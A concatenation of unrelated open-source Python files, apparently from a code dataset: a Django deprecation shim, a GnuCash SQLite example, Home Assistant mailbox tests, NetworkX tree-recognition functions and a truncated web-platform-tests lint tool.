from django.utils.deprecation import RemovedInDjango110Warning
default_app_config = 'django.contrib.webdesign.apps.WebDesignConfig'
warnings.warn(
"django.contrib.webdesign will be removed in Django 1.10. The "
"{% lorem %} tag is now included in the built-in tags.",
RemovedInDjango110Warning
)
|
slisson/intellij-community | refs/heads/master | python/testData/intentions/beforeTransformConditionalExpression.py | 83 | x = a if <caret>cond else b |
taladar/gnucash | refs/heads/master | src/optional/python-bindings/example_scripts/simple_sqlite_create.py | 1 | #!/usr/bin/env python
from gnucash import Session, Account
from os.path import abspath
from gnucash.gnucash_core_c import ACCT_TYPE_ASSET
s = Session('sqlite3://%s' % abspath('test.blob'), True)
# this seems to make a difference in more complex cases
s.save()
book = s.book
root = book.get_root_account()
a = Account(book)
root.append_child(a)
a.SetName('wow')
a.SetType(ACCT_TYPE_ASSET)
commod_table = book.get_table()
a.SetCommodity( commod_table.lookup('CURRENCY', 'CAD') )
s.save()
s.end()
|
auduny/home-assistant | refs/heads/dev | tests/components/mailbox/test_init.py | 12 | """The tests for the mailbox component."""
import asyncio
from hashlib import sha1
import pytest
from homeassistant.bootstrap import async_setup_component
import homeassistant.components.mailbox as mailbox
@pytest.fixture
def mock_http_client(hass, hass_client):
"""Start the Hass HTTP component."""
config = {
mailbox.DOMAIN: {
'platform': 'demo'
}
}
hass.loop.run_until_complete(
async_setup_component(hass, mailbox.DOMAIN, config))
return hass.loop.run_until_complete(hass_client())
@asyncio.coroutine
def test_get_platforms_from_mailbox(mock_http_client):
"""Get platforms from mailbox."""
url = "/api/mailbox/platforms"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 1 and "DemoMailbox" == result[0].get('name', None)
@asyncio.coroutine
def test_get_messages_from_mailbox(mock_http_client):
"""Get messages from mailbox."""
url = "/api/mailbox/messages/DemoMailbox"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 10
@asyncio.coroutine
def test_get_media_from_mailbox(mock_http_client):
"""Get audio from mailbox."""
mp3sha = "3f67c4ea33b37d1710f772a26dd3fb43bb159d50"
msgtxt = ("Message 1. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgsha = sha1(msgtxt.encode('utf-8')).hexdigest()
url = "/api/mailbox/media/DemoMailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 200
data = yield from req.read()
assert sha1(data).hexdigest() == mp3sha
@asyncio.coroutine
def test_delete_from_mailbox(mock_http_client):
"""Get audio from mailbox."""
msgtxt1 = ("Message 1. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgtxt2 = ("Message 3. "
"Lorem ipsum dolor sit amet, consectetur adipiscing elit. ")
msgsha1 = sha1(msgtxt1.encode('utf-8')).hexdigest()
msgsha2 = sha1(msgtxt2.encode('utf-8')).hexdigest()
for msg in [msgsha1, msgsha2]:
url = "/api/mailbox/delete/DemoMailbox/%s" % (msg)
req = yield from mock_http_client.delete(url)
assert req.status == 200
url = "/api/mailbox/messages/DemoMailbox"
req = yield from mock_http_client.get(url)
assert req.status == 200
result = yield from req.json()
assert len(result) == 8
@asyncio.coroutine
def test_get_messages_from_invalid_mailbox(mock_http_client):
"""Get messages from mailbox."""
url = "/api/mailbox/messages/mailbox.invalid_mailbox"
req = yield from mock_http_client.get(url)
assert req.status == 404
@asyncio.coroutine
def test_get_media_from_invalid_mailbox(mock_http_client):
"""Get messages from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/media/mailbox.invalid_mailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 404
@asyncio.coroutine
def test_get_media_from_invalid_msgid(mock_http_client):
"""Get messages from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/media/DemoMailbox/%s" % (msgsha)
req = yield from mock_http_client.get(url)
assert req.status == 500
@asyncio.coroutine
def test_delete_from_invalid_mailbox(mock_http_client):
"""Get audio from mailbox."""
msgsha = "0000000000000000000000000000000000000000"
url = "/api/mailbox/delete/mailbox.invalid_mailbox/%s" % (msgsha)
req = yield from mock_http_client.delete(url)
assert req.status == 404
|
OTWillems/GEO1005 | refs/heads/master | SpatialDecision/external/networkx/algorithms/tree/recognition.py | 28 | #-*- coding: utf-8 -*-
"""
Recognition Tests
=================
A *forest* is an acyclic, undirected graph, and a *tree* is a connected forest.
Depending on the subfield, there are various conventions for generalizing these
definitions to directed graphs.
In one convention, directed variants of forest and tree are defined in an
identical manner, except that the direction of the edges is ignored. In effect,
each directed edge is treated as a single undirected edge. Then, additional
restrictions are imposed to define *branchings* and *arborescences*.
In another convention, directed variants of forest and tree correspond to
the previous convention's branchings and arborescences, respectively. Then two
new terms, *polyforest* and *polytree*, are defined to correspond to the other
convention's forest and tree.
Summarizing::
+-----------------------------+
| Convention A | Convention B |
+=============================+
| forest | polyforest |
| tree | polytree |
| branching | forest |
| arborescence | tree |
+-----------------------------+
Each convention has its reasons. The first convention emphasizes definitional
similarity in that directed forests and trees are only concerned with
acyclicity and do not have an in-degree constraint, just as their undirected
counterparts do not. The second convention emphasizes functional similarity
in the sense that the directed analog of a spanning tree is a spanning
arborescence. That is, take any spanning tree and choose one node as the root.
Then every edge is assigned a direction such there is a directed path from the
root to every other node. The result is a spanning arborescence.
NetworkX follows convention "A". Explicitly, these are:
undirected forest
An undirected graph with no undirected cycles.
undirected tree
A connected, undirected forest.
directed forest
A directed graph with no undirected cycles. Equivalently, the underlying
graph structure (which ignores edge orientations) is an undirected forest.
In convention B, this is known as a polyforest.
directed tree
A weakly connected, directed forest. Equivalently, the underlying graph
structure (which ignores edge orientations) is an undirected tree. In
convention B, this is known as a polytree.
branching
A directed forest with each node having, at most, one parent. So the maximum
in-degree is equal to 1. In convention B, this is known as a forest.
arborescence
A directed tree with each node having, at most, one parent. So the maximum
in-degree is equal to 1. In convention B, this is known as a tree.
For trees and arborescences, the adjective "spanning" may be added to designate
that the graph, when considered as a forest/branching, consists of a single
tree/arborescence that includes all nodes in the graph. It is true, by
definition, that every tree/arborescence is spanning with respect to the nodes
that define the tree/arborescence and so, it might seem redundant to introduce
the notion of "spanning". However, the nodes may represent a subset of
nodes from a larger graph, and it is in this context that the term "spanning"
becomes a useful notion.
"""
import networkx as nx
__author__ = """\n""".join([
'Ferdinando Papale <[email protected]>',
'chebee7i <[email protected]>',
])
__all__ = ['is_arborescence', 'is_branching', 'is_forest', 'is_tree']
@nx.utils.not_implemented_for('undirected')
def is_arborescence(G):
"""
Returns ``True`` if ``G`` is an arborescence.
An arborescence is a directed tree with maximum in-degree equal to 1.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is an arborescence.
Notes
-----
In another convention, an arborescence is known as a *tree*.
See Also
--------
is_tree
"""
if not is_tree(G):
return False
if max(G.in_degree().values()) > 1:
return False
return True
@nx.utils.not_implemented_for('undirected')
def is_branching(G):
"""
Returns ``True`` if ``G`` is a branching.
A branching is a directed forest with maximum in-degree equal to 1.
Parameters
----------
G : directed graph
The directed graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a branching.
Notes
-----
In another convention, a branching is also known as a *forest*.
See Also
--------
is_forest
"""
if not is_forest(G):
return False
if max(G.in_degree().values()) > 1:
return False
return True
def is_forest(G):
"""
Returns ``True`` if ``G`` is a forest.
A forest is a graph with no undirected cycles.
For directed graphs, ``G`` is a forest if the underlying graph is a forest.
The underlying graph is obtained by treating each directed edge as a single
undirected edge in a multigraph.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a forest.
Notes
-----
In another convention, a directed forest is known as a *polyforest* and
then *forest* corresponds to a *branching*.
See Also
--------
is_branching
"""
if len(G) == 0:
raise nx.exception.NetworkXPointlessConcept('G has no nodes.')
if G.is_directed():
components = nx.weakly_connected_component_subgraphs
else:
components = nx.connected_component_subgraphs
for component in components(G):
# Make sure the component is a tree.
if component.number_of_edges() != component.number_of_nodes() - 1:
return False
return True
def is_tree(G):
"""
Returns ``True`` if ``G`` is a tree.
A tree is a connected graph with no undirected cycles.
For directed graphs, ``G`` is a tree if the underlying graph is a tree. The
underlying graph is obtained by treating each directed edge as a single
undirected edge in a multigraph.
Parameters
----------
G : graph
The graph to test.
Returns
-------
b : bool
A boolean that is ``True`` if ``G`` is a tree.
Notes
-----
In another convention, a directed tree is known as a *polytree* and then
*tree* corresponds to an *arborescence*.
See Also
--------
is_arborescence
"""
if len(G) == 0:
raise nx.exception.NetworkXPointlessConcept('G has no nodes.')
# A connected graph with no cycles has n-1 edges.
if G.number_of_edges() != len(G) - 1:
return False
if G.is_directed():
is_connected = nx.is_weakly_connected
else:
is_connected = nx.is_connected
return is_connected(G)
|
dati91/servo | refs/heads/master | tests/wpt/web-platform-tests/tools/lint/lint.py | 3 | from __future__ import print_function, unicode_literals
import abc
import argparse
import ast
import json
import os
import re
import subprocess
import sys
import tempfile
from collections import defaultdict
from . import fnmatch
from .. import localpaths
from ..gitignore.gitignore import PathFilter
from ..wpt import testfiles
from manifest.sourcefile import SourceFile, js_meta_re, python_meta_re, space_chars, get_any_variants, get_default_any_variants
from six import binary_type, iteritems, itervalues
from six.moves import range
from six.moves.urllib.parse import urlsplit, urljoin
import logging
logger = None
def setup_logging(prefix=False):
global logger
if logger is None:
logger = logging.getLogger(os.path.basename(os.path.splitext(__file__)[0]))
handler = logging.StreamHandler(sys.stdout)
# Only add a handler if the parent logger is missing a handler
if logger.parent and len(logger.parent.handlers) == 0:
handler = logging.StreamHandler(sys.stdout)
logger.addHandler(handler)
if prefix:
format = logging.BASIC_FORMAT
else:
format = "%(message)s"
formatter = logging.Formatter(format)
for handler in logger.handlers:
handler.setFormatter(formatter)
logger.setLevel(logging.DEBUG)
setup_logging()
ERROR_MSG = """You must fix all errors; for details on how to fix them, see
https://web-platform-tests.org/writing-tests/lint-tool.html
However, instead of fixing a particular error, it's sometimes
OK to add a line to the lint.whitelist file in the root of the
web-platform-tests directory to make the lint tool ignore it.
For example, to make the lint tool ignore all '%s'
errors in the %s file,
you could add the following line to the lint.whitelist file.
%s: %s"""
def all_filesystem_paths(repo_root, subdir=None):
path_filter = PathFilter(repo_root, extras=[".git/"])
if subdir:
expanded_path = subdir
else:
expanded_path = repo_root
for dirpath, dirnames, filenames in os.walk(expanded_path):
for filename in filenames:
path = os.path.relpath(os.path.join(dirpath, filename), repo_root)
if path_filter(path):
yield path
dirnames[:] = [item for item in dirnames if
path_filter(os.path.relpath(os.path.join(dirpath, item) + "/",
repo_root)+"/")]
def _all_files_equal(paths):
"""
Checks all the paths are files that are byte-for-byte identical
:param paths: the list of paths to compare
:returns: True if they are all identical
"""
paths = list(paths)
if len(paths) < 2:
return True
first = paths.pop()
size = os.path.getsize(first)
if any(os.path.getsize(path) != size for path in paths):
return False
# Chunk this to avoid eating up memory and file descriptors
bufsize = 4096*4 # 16KB, a "reasonable" number of disk sectors
groupsize = 8 # Hypothesised to be large enough in the common case that everything fits in one group
with open(first, "rb") as first_f:
for start in range(0, len(paths), groupsize):
path_group = paths[start:start+groupsize]
first_f.seek(0)
try:
files = [open(x, "rb") for x in path_group]
for _ in range(0, size, bufsize):
a = first_f.read(bufsize)
for f in files:
b = f.read(bufsize)
if a != b:
return False
finally:
for f in files:
f.close()
return True
def check_path_length(repo_root, path):
if len(path) + 1 > 150:
return [("PATH LENGTH", "/%s longer than maximum path length (%d > 150)" % (path, len(path) + 1), path, None)]
return []
def check_worker_collision(repo_root, path):
endings = [(".any.html", ".any.js"),
(".any.worker.html", ".any.js"),
(".worker.html", ".worker.js")]
for path_ending, generated in endings:
if path.endswith(path_ending):
return [("WORKER COLLISION",
"path ends with %s which collides with generated tests from %s files" % (path_ending, generated),
path,
None)]
return []
def check_ahem_copy(repo_root, path):
lpath = path.lower()
if "ahem" in lpath and lpath.endswith(".ttf"):
return [("AHEM COPY", "Don't add extra copies of Ahem, use /fonts/Ahem.ttf", path, None)]
return []
def check_git_ignore(repo_root, paths):
errors = []
with tempfile.TemporaryFile('w+') as f:
f.write('\n'.join(paths))
f.seek(0)
try:
matches = subprocess.check_output(
["git", "check-ignore", "--verbose", "--no-index", "--stdin"], stdin=f)
for match in matches.strip().split('\n'):
match_filter, path = match.split()
_, _, filter_string = match_filter.split(':')
# If the matching filter reported by check-ignore is a special-case exception,
# that's fine. Otherwise, it requires a new special-case exception.
if filter_string[0] != '!':
errors += [("IGNORED PATH", "%s matches an ignore filter in .gitignore - "
"please add a .gitignore exception" % path, path, None)]
except subprocess.CalledProcessError:
# Nonzero return code means that no match exists.
pass
return errors
drafts_csswg_re = re.compile(r"https?\:\/\/drafts\.csswg\.org\/([^/?#]+)")
w3c_tr_re = re.compile(r"https?\:\/\/www\.w3c?\.org\/TR\/([^/?#]+)")
w3c_dev_re = re.compile(r"https?\:\/\/dev\.w3c?\.org\/[^/?#]+\/([^/?#]+)")
def check_css_globally_unique(repo_root, paths):
"""
Checks that CSS filenames are sufficiently unique
This groups files by path classifying them as "test", "reference", or
"support".
"test" files must have a unique name across files that share links to the
same spec.
"reference" and "support" files, on the other hand, must have globally
unique names.
:param repo_root: the repository root
:param paths: list of all paths
:returns: a list of errors found in ``paths``
"""
test_files = defaultdict(set)
ref_files = defaultdict(set)
support_files = defaultdict(set)
for path in paths:
if os.name == "nt":
path = path.replace("\\", "/")
if not path.startswith("css/"):
continue
source_file = SourceFile(repo_root, path, "/")
if source_file.name_is_non_test:
# If we're name_is_non_test for a reason apart from support, ignore it.
# We care about support because of the requirement all support files in css/ to be in
# a support directory; see the start of check_parsed.
offset = path.find("/support/")
if offset == -1:
continue
parts = source_file.dir_path.split(os.path.sep)
if (parts[0] in source_file.root_dir_non_test or
any(item in source_file.dir_non_test - {"support"} for item in parts) or
any(parts[:len(non_test_path)] == list(non_test_path) for non_test_path in source_file.dir_path_non_test)):
continue
name = path[offset+1:]
support_files[name].add(path)
elif source_file.name_is_reference:
ref_files[source_file.name].add(path)
else:
test_files[source_file.name].add(path)
errors = []
for name, colliding in iteritems(test_files):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
# Only compute by_spec if there are prima-facie collisions because of cost
by_spec = defaultdict(set)
for path in colliding:
source_file = SourceFile(repo_root, path, "/")
for link in source_file.spec_links:
for r in (drafts_csswg_re, w3c_tr_re, w3c_dev_re):
m = r.match(link)
if m:
spec = m.group(1)
break
else:
continue
by_spec[spec].add(path)
for spec, paths in iteritems(by_spec):
if not _all_files_equal([os.path.join(repo_root, x) for x in paths]):
for x in paths:
errors.append(("CSS-COLLIDING-TEST-NAME",
"The filename %s in the %s testsuite is shared by: %s"
% (name,
spec,
", ".join(sorted(paths))),
x,
None))
for error_name, d in [("CSS-COLLIDING-REF-NAME", ref_files),
("CSS-COLLIDING-SUPPORT-NAME", support_files)]:
for name, colliding in iteritems(d):
if len(colliding) > 1:
if not _all_files_equal([os.path.join(repo_root, x) for x in colliding]):
for x in colliding:
errors.append((error_name,
"The filename %s is shared by: %s" % (name,
", ".join(sorted(colliding))),
x,
None))
return errors
def parse_whitelist(f):
"""
Parse the whitelist file given by `f`, and return the parsed structure.
"""
data = defaultdict(lambda:defaultdict(set))
ignored_files = set()
for line in f:
line = line.strip()
if not line or line.startswith("#"):
continue
parts = [item.strip() for item in line.split(":")]
if len(parts) == 2:
parts.append(None)
else:
parts[-1] = int(parts[-1])
error_types, file_match, line_number = parts
error_types = {item.strip() for item in error_types.split(",")}
file_match = os.path.normcase(file_match)
if "*" in error_types:
ignored_files.add(file_match)
else:
for error_type in error_types:
data[error_type][file_match].add(line_number)
return data, ignored_files
def filter_whitelist_errors(data, errors):
"""
Filter out those errors that are whitelisted in `data`.
"""
if not errors:
return []
whitelisted = [False for item in range(len(errors))]
for i, (error_type, msg, path, line) in enumerate(errors):
normpath = os.path.normcase(path)
# Allow whitelisting all lint errors except the IGNORED PATH lint,
# which explains how to fix it correctly and shouldn't be ignored.
if error_type in data and error_type != "IGNORED PATH":
wl_files = data[error_type]
for file_match, allowed_lines in iteritems(wl_files):
if None in allowed_lines or line in allowed_lines:
if fnmatch.fnmatchcase(normpath, file_match):
whitelisted[i] = True
return [item for i, item in enumerate(errors) if not whitelisted[i]]
class Regexp(object):
pattern = None
file_extensions = None
error = None
_re = None
def __init__(self):
self._re = re.compile(self.pattern)
def applies(self, path):
return (self.file_extensions is None or
os.path.splitext(path)[1] in self.file_extensions)
def search(self, line):
return self._re.search(line)
class TrailingWhitespaceRegexp(Regexp):
pattern = b"[ \t\f\v]$"
error = "TRAILING WHITESPACE"
description = "Whitespace at EOL"
class TabsRegexp(Regexp):
pattern = b"^\t"
error = "INDENT TABS"
description = "Tabs used for indentation"
class CRRegexp(Regexp):
pattern = b"\r$"
error = "CR AT EOL"
description = "CR character in line separator"
class SetTimeoutRegexp(Regexp):
pattern = b"setTimeout\s*\("
error = "SET TIMEOUT"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "setTimeout used; step_timeout should typically be used instead"
class W3CTestOrgRegexp(Regexp):
pattern = b"w3c\-test\.org"
error = "W3C-TEST.ORG"
description = "External w3c-test.org domain used"
class WebPlatformTestRegexp(Regexp):
pattern = b"web\-platform\.test"
error = "WEB-PLATFORM.TEST"
description = "Internal web-platform.test domain used"
class Webidl2Regexp(Regexp):
pattern = b"webidl2\.js"
error = "WEBIDL2.JS"
description = "Legacy webidl2.js script used"
class ConsoleRegexp(Regexp):
pattern = b"console\.[a-zA-Z]+\s*\("
error = "CONSOLE"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "Console logging API used"
class GenerateTestsRegexp(Regexp):
pattern = b"generate_tests\s*\("
error = "GENERATE_TESTS"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "generate_tests used"
class PrintRegexp(Regexp):
pattern = b"print(?:\s|\s*\()"
error = "PRINT STATEMENT"
file_extensions = [".py"]
description = "Print function used"
class LayoutTestsRegexp(Regexp):
pattern = b"eventSender|testRunner|window\.internals"
error = "LAYOUTTESTS APIS"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "eventSender/testRunner/window.internals used; these are LayoutTests-specific APIs (WebKit/Blink)"
class SpecialPowersRegexp(Regexp):
pattern = b"SpecialPowers"
error = "SPECIALPOWERS API"
file_extensions = [".html", ".htm", ".js", ".xht", ".xhtml", ".svg"]
description = "SpecialPowers used; this is gecko-specific and not supported in wpt"
regexps = [item() for item in
[TrailingWhitespaceRegexp,
TabsRegexp,
CRRegexp,
SetTimeoutRegexp,
W3CTestOrgRegexp,
WebPlatformTestRegexp,
Webidl2Regexp,
ConsoleRegexp,
GenerateTestsRegexp,
PrintRegexp,
LayoutTestsRegexp,
SpecialPowersRegexp]]
def check_regexp_line(repo_root, path, f):
errors = []
applicable_regexps = [regexp for regexp in regexps if regexp.applies(path)]
for i, line in enumerate(f):
for regexp in applicable_regexps:
if regexp.search(line):
errors.append((regexp.error, regexp.description, path, i+1))
return errors
def check_parsed(repo_root, path, f):
source_file = SourceFile(repo_root, path, "/", contents=f.read())
errors = []
if path.startswith("css/"):
if (source_file.type == "support" and
not source_file.name_is_non_test and
not source_file.name_is_reference):
return [("SUPPORT-WRONG-DIR", "Support file not in support directory", path, None)]
if (source_file.type != "support" and
not source_file.name_is_reference and
not source_file.spec_links):
return [("MISSING-LINK", "Testcase file must have a link to a spec", path, None)]
if source_file.name_is_non_test:
return []
if source_file.markup_type is None:
return []
if source_file.root is None:
return [("PARSE-FAILED", "Unable to parse file", path, None)]
if source_file.type == "manual" and not source_file.name_is_manual:
errors.append(("CONTENT-MANUAL", "Manual test whose filename doesn't end in '-manual'", path, None))
if source_file.type == "visual" and not source_file.name_is_visual:
errors.append(("CONTENT-VISUAL", "Visual test whose filename doesn't end in '-visual'", path, None))
for reftest_node in source_file.reftest_nodes:
href = reftest_node.attrib.get("href", "").strip(space_chars)
parts = urlsplit(href)
if (parts.scheme or parts.netloc) and parts != urlsplit("about:blank"):
errors.append(("ABSOLUTE-URL-REF",
"Reference test with a reference file specified via an absolute URL: '%s'" % href, path, None))
continue
ref_url = urljoin(source_file.url, href)
ref_parts = urlsplit(ref_url)
if source_file.url == ref_url:
errors.append(("SAME-FILE-REF",
"Reference test which points at itself as a reference",
path,
None))
continue
assert ref_parts.path != ""
reference_file = os.path.join(repo_root, ref_parts.path[1:])
reference_rel = reftest_node.attrib.get("rel", "")
if not os.path.isfile(reference_file):
errors.append(("NON-EXISTENT-REF",
"Reference test with a non-existent '%s' relationship reference: '%s'" % (reference_rel, href), path, None))
if len(source_file.timeout_nodes) > 1:
errors.append(("MULTIPLE-TIMEOUT", "More than one meta name='timeout'", path, None))
for timeout_node in source_file.timeout_nodes:
timeout_value = timeout_node.attrib.get("content", "").lower()
if timeout_value != "long":
errors.append(("INVALID-TIMEOUT", "Invalid timeout value %s" % timeout_value, path, None))
if source_file.testharness_nodes:
if len(source_file.testharness_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESS",
"More than one <script src='/resources/testharness.js'>", path, None))
testharnessreport_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testharnessreport.js']")
if not testharnessreport_nodes:
errors.append(("MISSING-TESTHARNESSREPORT",
"Missing <script src='/resources/testharnessreport.js'>", path, None))
else:
if len(testharnessreport_nodes) > 1:
errors.append(("MULTIPLE-TESTHARNESSREPORT",
"More than one <script src='/resources/testharnessreport.js'>", path, None))
testharnesscss_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}link[@href='/resources/testharness.css']")
if testharnesscss_nodes:
errors.append(("PRESENT-TESTHARNESSCSS",
"Explicit link to testharness.css present", path, None))
for element in source_file.variant_nodes:
if "content" not in element.attrib:
errors.append(("VARIANT-MISSING",
"<meta name=variant> missing 'content' attribute", path, None))
else:
variant = element.attrib["content"]
if variant != "" and variant[0] not in ("?", "#"):
errors.append(("MALFORMED-VARIANT",
"%s <meta name=variant> 'content' attribute must be the empty string or start with '?' or '#'" % path, None))
seen_elements = {"timeout": False,
"testharness": False,
"testharnessreport": False}
required_elements = [key for key, value in {"testharness": True,
"testharnessreport": len(testharnessreport_nodes) > 0,
"timeout": len(source_file.timeout_nodes) > 0}.items()
if value]
for elem in source_file.root.iter():
if source_file.timeout_nodes and elem == source_file.timeout_nodes[0]:
seen_elements["timeout"] = True
if seen_elements["testharness"]:
errors.append(("LATE-TIMEOUT",
"<meta name=timeout> seen after testharness.js script", path, None))
elif elem == source_file.testharness_nodes[0]:
seen_elements["testharness"] = True
elif testharnessreport_nodes and elem == testharnessreport_nodes[0]:
seen_elements["testharnessreport"] = True
if not seen_elements["testharness"]:
errors.append(("EARLY-TESTHARNESSREPORT",
"testharnessreport.js script seen before testharness.js script", path, None))
if all(seen_elements[name] for name in required_elements):
break
if source_file.testdriver_nodes:
if len(source_file.testdriver_nodes) > 1:
errors.append(("MULTIPLE-TESTDRIVER",
"More than one <script src='/resources/testdriver.js'>", path, None))
testdriver_vendor_nodes = source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src='/resources/testdriver-vendor.js']")
if not testdriver_vendor_nodes:
errors.append(("MISSING-TESTDRIVER-VENDOR",
"Missing <script src='/resources/testdriver-vendor.js'>", path, None))
else:
if len(testdriver_vendor_nodes) > 1:
errors.append(("MULTIPLE-TESTDRIVER-VENDOR",
"More than one <script src='/resources/testdriver-vendor.js'>", path, None))
for element in source_file.root.findall(".//{http://www.w3.org/1999/xhtml}script[@src]"):
src = element.attrib["src"]
for name in ["testharness", "testharnessreport", "testdriver", "testdriver-vendor"]:
if "%s.js" % name == src or ("/%s.js" % name in src and src != "/resources/%s.js" % name):
errors.append(("%s-PATH" % name.upper(), "%s.js script seen with incorrect path" % name, path, None))
return errors
class ASTCheck(object):
__metaclass__ = abc.ABCMeta
error = None
description = None
@abc.abstractmethod
def check(self, root):
pass
class OpenModeCheck(ASTCheck):
error = "OPEN-NO-MODE"
description = "File opened without providing an explicit mode (note: binary files must be read with 'b' in the mode flags)"
def check(self, root):
errors = []
for node in ast.walk(root):
if isinstance(node, ast.Call):
if hasattr(node.func, "id") and node.func.id in ("open", "file"):
if (len(node.args) < 2 and
all(item.arg != "mode" for item in node.keywords)):
errors.append(node.lineno)
return errors
ast_checkers = [item() for item in [OpenModeCheck]]
def check_python_ast(repo_root, path, f):
if not path.endswith(".py"):
return []
try:
root = ast.parse(f.read())
except SyntaxError as e:
return [("PARSE-FAILED", "Unable to parse file", path, e.lineno)]
errors = []
for checker in ast_checkers:
for lineno in checker.check(root):
errors.append((checker.error, checker.description, path, lineno))
return errors
broken_js_metadata = re.compile(b"//\s*META:")
broken_python_metadata = re.compile(b"#\s*META:")
def check_global_metadata(value):
global_values = {item.strip() for item in value.split(b",") if item.strip()}
included_variants = set.union(get_default_any_variants(),
*(get_any_variants(v) for v in global_values if not v.startswith(b"!")))
for global_value in global_values:
if global_value.startswith(b"!"):
excluded_value = global_value[1:]
if not get_any_variants(excluded_value):
yield ("UNKNOWN-GLOBAL-METADATA", "Unexpected value for global metadata")
elif excluded_value in global_values:
yield ("BROKEN-GLOBAL-METADATA", "Cannot specify both %s and %s" % (global_value, excluded_value))
else:
excluded_variants = get_any_variants(excluded_value)
if not (excluded_variants & included_variants):
yield ("BROKEN-GLOBAL-METADATA", "Cannot exclude %s if it is not included" % (excluded_value,))
else:
if not get_any_variants(global_value):
yield ("UNKNOWN-GLOBAL-METADATA", "Unexpected value for global metadata")
def check_script_metadata(repo_root, path, f):
if path.endswith((".worker.js", ".any.js")):
meta_re = js_meta_re
broken_metadata = broken_js_metadata
elif path.endswith(".py"):
meta_re = python_meta_re
broken_metadata = broken_python_metadata
else:
return []
done = False
errors = []
for idx, line in enumerate(f):
assert isinstance(line, binary_type), line
m = meta_re.match(line)
if m:
key, value = m.groups()
if key == b"global":
errors.extend((kind, message, path, idx + 1) for (kind, message) in check_global_metadata(value))
elif key == b"timeout":
if value != b"long":
errors.append(("UNKNOWN-TIMEOUT-METADATA", "Unexpected value for timeout metadata", path, idx + 1))
elif key == b"title":
pass
elif key == b"script":
pass
elif key == b"variant":
pass
else:
errors.append(("UNKNOWN-METADATA", "Unexpected kind of metadata", path, idx + 1))
else:
done = True
if done:
if meta_re.match(line):
errors.append(("STRAY-METADATA", "Metadata comments should start the file", path, idx + 1))
elif meta_re.search(line):
errors.append(("INDENTED-METADATA", "Metadata comments should start the line", path, idx + 1))
elif broken_metadata.search(line):
errors.append(("BROKEN-METADATA", "Metadata comment is not formatted correctly", path, idx + 1))
return errors
def check_path(repo_root, path):
"""
Runs lints that check the file path.
:param repo_root: the repository root
:param path: the path of the file within the repository
:returns: a list of errors found in ``path``
"""
errors = []
for path_fn in path_lints:
errors.extend(path_fn(repo_root, path))
return errors
def check_all_paths(repo_root, paths):
"""
Runs lints that check all paths globally.
:param repo_root: the repository root
:param paths: a list of all the paths within the repository
:returns: a list of errors found in ``f``
"""
errors = []
for paths_fn in all_paths_lints:
errors.extend(paths_fn(repo_root, paths))
return errors
def check_file_contents(repo_root, path, f):
"""
Runs lints that check the file contents.
:param repo_root: the repository root
:param path: the path of the file within the repository
:param f: a file-like object with the file contents
:returns: a list of errors found in ``f``
"""
errors = []
for file_fn in file_lints:
errors.extend(file_fn(repo_root, path, f))
f.seek(0)
return errors
def output_errors_text(errors):
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s: %s (%s)" % (pos_string, description, error_type))
def output_errors_markdown(errors):
if not errors:
return
heading = """Got lint errors:
| Error Type | Position | Message |
|------------|----------|---------|"""
for line in heading.split("\n"):
logger.error(line)
for error_type, description, path, line_number in errors:
pos_string = path
if line_number:
pos_string += ":%s" % line_number
logger.error("%s | %s | %s |" % (error_type, pos_string, description))
def output_errors_json(errors):
for error_type, error, path, line_number in errors:
print(json.dumps({"path": path, "lineno": line_number,
"rule": error_type, "message": error}))
def output_error_count(error_count):
if not error_count:
return
by_type = " ".join("%s: %d" % item for item in error_count.items())
count = sum(error_count.values())
logger.info("")
if count == 1:
logger.info("There was 1 error (%s)" % (by_type,))
else:
logger.info("There were %d errors (%s)" % (count, by_type))
def changed_files(wpt_root):
revish = testfiles.get_revish(revish=None)
changed, _ = testfiles.files_changed(revish, set(), include_uncommitted=True, include_new=True)
return [os.path.relpath(item, wpt_root) for item in changed]
def lint_paths(kwargs, wpt_root):
if kwargs.get("paths"):
paths = []
for path in kwargs.get("paths"):
if os.path.isdir(path):
path_dir = list(all_filesystem_paths(wpt_root, path))
paths.extend(path_dir)
elif os.path.isfile(path):
paths.append(os.path.relpath(os.path.abspath(path), wpt_root))
elif kwargs["all"]:
paths = list(all_filesystem_paths(wpt_root))
else:
changed_paths = changed_files(wpt_root)
force_all = False
for path in changed_paths:
path = path.replace(os.path.sep, "/")
if path == "lint.whitelist" or path.startswith("tools/lint/"):
force_all = True
break
paths = (list(changed_paths) if not force_all
else list(all_filesystem_paths(wpt_root)))
return paths
def create_parser():
parser = argparse.ArgumentParser()
parser.add_argument("paths", nargs="*",
help="List of paths to lint")
parser.add_argument("--json", action="store_true",
help="Output machine-readable JSON format")
parser.add_argument("--markdown", action="store_true",
help="Output markdown")
parser.add_argument("--repo-root", help="The WPT directory. Use this"
"option if the lint script exists outside the repository")
parser.add_argument("--all", action="store_true", help="If no paths are passed, try to lint the whole "
"working directory, not just files that changed")
return parser
def main(**kwargs):
if kwargs.get("json") and kwargs.get("markdown"):
logger.critical("Cannot specify --json and --markdown")
sys.exit(2)
repo_root = kwargs.get('repo_root') or localpaths.repo_root
